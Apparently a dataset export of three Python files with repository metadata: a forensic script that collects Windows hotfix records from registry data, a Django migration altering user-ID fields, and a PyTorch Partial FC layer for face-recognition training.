install_high = hotfix_infos.get('InstallTimeHigh')
install_low = hotfix_infos.get('InstallTimeLow')
if install_high and install_low:
timestamp = filetime_to_timestamp(
filetime_join(install_high, install_low))
else:
timestamp = ''
installer_entries[hotfix.group(0)].add(timestamp)
for hotfix in installer_entries:
entries.append({
'Hotfix':
hotfix,
'Installed':
sorted(installer_entries[hotfix])[0]
if installer_entries[hotfix] else '-',
'Source':
'Component Based Servicing',
"type":
"hotfix"
})
return entries
def _analyze_additional(key):
hotfix = key["key"].split('\\')[-1]
product = key["key"].split('\\')[-2]
return [{
'Hotfix': hotfix,
'Installed': key["modified"],
'Source': 'Microsoft Updates',
'Component': product,
"type": "hotfix"
}]
def transform(obj):
if any(map(lambda path: obj["key"].lower().startswith(path), HOTFIX_PATHS_INSTALLER)):
return _analyze_installer(obj)
if any(map(lambda path: obj["key"].lower().startswith(path), HOTFIX_PATHS_ADDITIONAL)):
return _analyze_additional(obj)
return []
def filetime_join(upper, lower):
"""
:param upper: upper part of the number
:param lower: lower part of the number
"""
return struct.unpack('Q', struct.pack('ii', lower, upper))[0]
def filetime_to_timestamp(filetime_64):
"""
    The FILETIME timestamp is a 64-bit integer that contains the number
    of 100-nanosecond intervals since 1601-01-01 00:00:00.
    The number is usually saved in the registry using two DWORD values.
    :return: string of UTC time
"""
# pylint: disable=invalid-name
HUNDREDS_OF_NANOSECONDS_IN_A_SECOND = 10000000
UNIXEPOCH_AS_FILETIME = 116444736000000000
datetime_stamp = datetime.utcfromtimestamp(
(filetime_64 - UNIXEPOCH_AS_FILETIME) /
HUNDREDS_OF_NANOSECONDS_IN_A_SECOND)
return datetime_stamp.isoformat()
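# Worked example: the Unix epoch expressed in FILETIME units is
# 116444736000000000 (the 100ns ticks from 1601 to 1970), so:
#   filetime_to_timestamp(116444736000000000) == '1970-01-01T00:00:00'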
def main():
store = forensicstore.connect(".")
hklmsw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\"
conditions = [{
'key':
hklmsw +
"Microsoft\\Windows\\CurrentVersion\\Component Based Servicing\\Packages\\%"
}, {
'key': hklmsw + "WOW6432Node\\Microsoft\\Updates\\%\\%"
}, {
'key': hklmsw + "Microsoft\\Updates\\%\\%"
}]
for item in store.select("windows-registry-key", combined_conditions(conditions)):
results = transform(item)
for result in results:
store.insert(result)
store.close()
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
fossabot.noreply@github.com
|
99871bec3457acd943707f85993b4ee2b8e01ff4
|
1b14bc0a6ea80ac0c1a3a6f8dbc7d461e607c2f5
|
/textma/sva/migrations/0003_auto_20160609_1521.py
|
de76563a2ef0b21203f6dad541ca58b98d12f74c
|
[] |
no_license
|
elwan/django
|
9fe3afc9efe31d0a63bd810b1c4d74040834cb5a
|
dc8b0ecc8ef7da6f07c230707b29a65c9cc55e7a
|
refs/heads/master
| 2020-04-06T06:58:49.353845
| 2016-07-19T12:25:23
| 2016-07-19T12:25:23
| 38,568,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 901
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-06-09 15:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sva', '0002_auto_20160609_1518'),
]
operations = [
migrations.AlterField(
model_name='message_erreur',
name='msg_erreur_utilisateur_id',
field=models.IntegerField(default=0, verbose_name='ID Utilisateur'),
),
migrations.AlterField(
model_name='message_multi',
name='utilisateur_id',
field=models.IntegerField(default=0, verbose_name='ID Utilisateur'),
),
migrations.AlterField(
model_name='reponse',
name='reponse_utilisateur_id',
field=models.IntegerField(default=0, verbose_name='ID Utilisateur'),
),
]
|
[
"elwan7@gmail.com"
] |
elwan7@gmail.com
|
690ddbacd49f54be38fe169b8cab0f1ee0eb2081
|
60766ab0ba3157d9eca0118bc3cfdb93011848c9
|
/code/insightface/arcface_torch/partial_fc.py
|
13c427a3e1eff684464b08664895e64931cbcbd9
|
[] |
no_license
|
wujiekd/Face_recognition_cnn
|
d63cb8b953b78b3bdabdfeaf1b5471579e9b2fbc
|
229b18a8eea1bcc3362f050cb3af2bc92beeaae5
|
refs/heads/main
| 2023-07-15T21:51:20.734410
| 2021-09-04T06:09:45
| 2021-09-04T06:09:45
| 403,071,269
| 1
| 0
| null | 2021-09-04T14:02:34
| 2021-09-04T14:02:33
| null |
UTF-8
|
Python
| false
| false
| 9,615
|
py
|
# -*- coding: utf-8 -*-
import logging
import os
import torch
#import torch.distributed as dist
from torch.nn import Module
from torch.nn.functional import normalize, linear
from torch.nn.parameter import Parameter
class PartialFC(Module):
"""
Author: {Xiang An, Yang Xiao, XuHan Zhu} in DeepGlint,
Partial FC: Training 10 Million Identities on a Single Machine
See the original paper:
https://arxiv.org/abs/2010.05222
"""
@torch.no_grad()
def __init__(self, rank, local_rank, world_size, batch_size, resume,
margin_softmax, num_classes, sample_rate=1.0, embedding_size=512, prefix="./"):
"""
rank: int
Unique process(GPU) ID from 0 to world_size - 1.
local_rank: int
Unique process(GPU) ID within the server from 0 to 7.
world_size: int
Number of GPU.
batch_size: int
Batch size on current rank(GPU).
resume: bool
Select whether to restore the weight of softmax.
margin_softmax: callable
A function of margin softmax, eg: cosface, arcface.
num_classes: int
The number of class center storage in current rank(CPU/GPU), usually is total_classes // world_size,
required.
sample_rate: float
            The partial fc sampling rate; when the number of classes grows beyond 2 million, sampling
            can greatly speed up training and reduce a lot of GPU memory, default is 1.0.
embedding_size: int
The feature dimension, default is 512.
prefix: str
Path for save checkpoint, default is './'.
"""
super(PartialFC, self).__init__()
#
self.num_classes: int = num_classes
self.rank: int = rank
self.local_rank: int = local_rank
self.device: torch.device = torch.device("cuda:{}".format(self.local_rank))
self.world_size: int = world_size
self.batch_size: int = batch_size
self.margin_softmax: callable = margin_softmax
self.sample_rate: float = sample_rate
self.embedding_size: int = embedding_size
self.prefix: str = prefix
self.num_local: int = num_classes // world_size + int(rank < num_classes % world_size)
self.class_start: int = num_classes // world_size * rank + min(rank, num_classes % world_size)
self.num_sample: int = int(self.sample_rate * self.num_local)
self.weight_name = os.path.join(self.prefix, "rank_{}_softmax_weight.pt".format(self.rank))
self.weight_mom_name = os.path.join(self.prefix, "rank_{}_softmax_weight_mom.pt".format(self.rank))
if resume:
try:
self.weight: torch.Tensor = torch.load(self.weight_name)
self.weight_mom: torch.Tensor = torch.load(self.weight_mom_name)
if self.weight.shape[0] != self.num_local or self.weight_mom.shape[0] != self.num_local:
raise IndexError
logging.info("softmax weight resume successfully!")
logging.info("softmax weight mom resume successfully!")
except (FileNotFoundError, KeyError, IndexError):
self.weight = torch.normal(0, 0.01, (self.num_local, self.embedding_size), device=self.device)
self.weight_mom: torch.Tensor = torch.zeros_like(self.weight)
logging.info("softmax weight init!")
logging.info("softmax weight mom init!")
else:
self.weight = torch.normal(0, 0.01, (self.num_local, self.embedding_size), device=self.device)
self.weight_mom: torch.Tensor = torch.zeros_like(self.weight)
logging.info("softmax weight init successfully!")
logging.info("softmax weight mom init successfully!")
self.stream: torch.cuda.Stream = torch.cuda.Stream(local_rank)
self.index = None
if int(self.sample_rate) == 1:
self.update = lambda: 0
self.sub_weight = Parameter(self.weight)
self.sub_weight_mom = self.weight_mom
else:
self.sub_weight = Parameter(torch.empty((0, 0)).cuda(local_rank))
def save_params(self):
""" Save softmax weight for each rank on prefix
"""
torch.save(self.weight.data, self.weight_name)
torch.save(self.weight_mom, self.weight_mom_name)
@torch.no_grad()
def sample(self, total_label):
"""
        Sample all positive class centers in each rank, and randomly select negative class centers to fill a fixed
        `num_sample`.
total_label: tensor
Label after all gather, which cross all GPUs.
"""
index_positive = (self.class_start <= total_label) & (total_label < self.class_start + self.num_local)
total_label[~index_positive] = -1
total_label[index_positive] -= self.class_start
if int(self.sample_rate) != 1:
positive = torch.unique(total_label[index_positive], sorted=True)
if self.num_sample - positive.size(0) >= 0:
perm = torch.rand(size=[self.num_local], device=self.device)
perm[positive] = 2.0
index = torch.topk(perm, k=self.num_sample)[1]
index = index.sort()[0]
else:
index = positive
self.index = index
total_label[index_positive] = torch.searchsorted(index, total_label[index_positive])
self.sub_weight = Parameter(self.weight[index])
self.sub_weight_mom = self.weight_mom[index]
def forward(self, total_features, norm_weight):
""" Partial fc forward, `logits = X * sample(W)`
"""
torch.cuda.current_stream().wait_stream(self.stream)
logits = linear(total_features, norm_weight)
return logits
@torch.no_grad()
def update(self):
""" Set updated weight and weight_mom to memory bank.
"""
self.weight_mom[self.index] = self.sub_weight_mom
self.weight[self.index] = self.sub_weight
def prepare(self, label, optimizer):
"""
get sampled class centers for cal softmax.
label: tensor
Label tensor on each rank.
optimizer: opt
Optimizer for partial fc, which need to get weight mom.
"""
with torch.cuda.stream(self.stream):
total_label = torch.zeros(
size=[self.batch_size * self.world_size], device=self.device, dtype=torch.long)
#dist.all_gather(list(total_label.chunk(self.world_size, dim=0)), label)
total_label = label
self.sample(total_label)
optimizer.state.pop(optimizer.param_groups[-1]['params'][0], None)
optimizer.param_groups[-1]['params'][0] = self.sub_weight
optimizer.state[self.sub_weight]['momentum_buffer'] = self.sub_weight_mom
norm_weight = normalize(self.sub_weight)
return total_label, norm_weight
def forward_backward(self, label, features, optimizer):
"""
Partial fc forward and backward with model parallel
label: tensor
Label tensor on each rank(GPU)
features: tensor
Features tensor on each rank(GPU)
optimizer: optimizer
Optimizer for partial fc
Returns:
--------
x_grad: tensor
The gradient of features.
loss_v: tensor
Loss value for cross entropy.
"""
total_label, norm_weight = self.prepare(label, optimizer)
total_features = torch.zeros(
size=[self.batch_size * self.world_size, self.embedding_size], device=self.device)
#dist.all_gather(list(total_features.chunk(self.world_size, dim=0)), features.data)
total_features = features.data
total_features.requires_grad = True
logits = self.forward(total_features, norm_weight)
logits = self.margin_softmax(logits, total_label.cuda())
with torch.no_grad():
max_fc = torch.max(logits, dim=1, keepdim=True)[0]
#dist.all_reduce(max_fc, dist.ReduceOp.MAX)
# calculate exp(logits) and all-reduce
logits_exp = torch.exp(logits - max_fc)
logits_sum_exp = logits_exp.sum(dim=1, keepdims=True)
#dist.all_reduce(logits_sum_exp, dist.ReduceOp.SUM)
# calculate prob
logits_exp.div_(logits_sum_exp)
# get one-hot
grad = logits_exp
index = torch.where(total_label != -1)[0]
one_hot = torch.zeros(size=[index.size()[0], grad.size()[1]], device=grad.device)
one_hot.scatter_(1, total_label[index, None].cuda(), 1)
# calculate loss
loss = torch.zeros(grad.size()[0], 1, device=grad.device)
loss[index] = grad[index].gather(1, total_label[index, None].cuda())
#dist.all_reduce(loss, dist.ReduceOp.SUM)
loss_v = loss.clamp_min_(1e-30).log_().mean() * (-1)
# calculate grad
grad[index] -= one_hot
grad.div_(self.batch_size * self.world_size)
logits.backward(grad)
if total_features.grad is not None:
total_features.grad.detach_()
        # single-process stand-in for the commented-out dist.reduce_scatter:
        # without it x_grad would stay all-zero and the backbone would receive
        # no gradient, so take the gathered features' gradient directly
        #dist.reduce_scatter(x_grad, list(total_features.grad.chunk(self.world_size, dim=0)))
        x_grad: torch.Tensor = total_features.grad * self.world_size
# backward backbone
return x_grad, loss_v
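# Hedged usage sketch (single-process variant, matching the commented-out
# dist calls above; margin_fn, labels, features and opt stand in for the
# caller's objects and are not defined in this file):
#
#   pfc = PartialFC(rank=0, local_rank=0, world_size=1, batch_size=64,
#                   resume=False, margin_softmax=margin_fn, num_classes=10000,
#                   sample_rate=0.1, embedding_size=512)
#   x_grad, loss_v = pfc.forward_backward(labels, features, opt)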
|
[
"noreply@github.com"
] |
wujiekd.noreply@github.com
|